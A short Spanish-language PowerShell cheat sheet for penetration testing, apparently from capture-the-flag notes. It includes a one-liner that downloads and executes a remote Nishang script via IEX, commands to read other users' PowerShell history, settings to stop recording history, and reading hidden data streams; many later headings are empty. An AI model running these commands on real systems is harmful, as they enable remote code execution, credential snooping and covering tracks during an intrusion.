Powershell

Ejecución de scripts remotos

IEX(New-Object Net.WebClient).downloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1")

Listar procesos

*Evil-WinRM* PS C:\Users\alcibiades\Desktop> Get-Process

Ver historial

(Get-PSReadlineOption).HistorySavePath
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Truco para no guardar historial

Set-PSReadlineOption -HistorySaveStyle SaveNothing
unset HISTFILE

Obtener ADS

dir /r /s
more < hm.txt:root.txt

Obtener SID

Obtener Domain Admins

Secure-String a Plain-Text

Desde XML

Script Blocks

PS-Sessions

Listar reglas de Firewall

Obtener Eventos

WAF Evasion (Administrator)

Remplazar contenido

Listar sesiones RDP

Tomar captura de pantalla

Last updated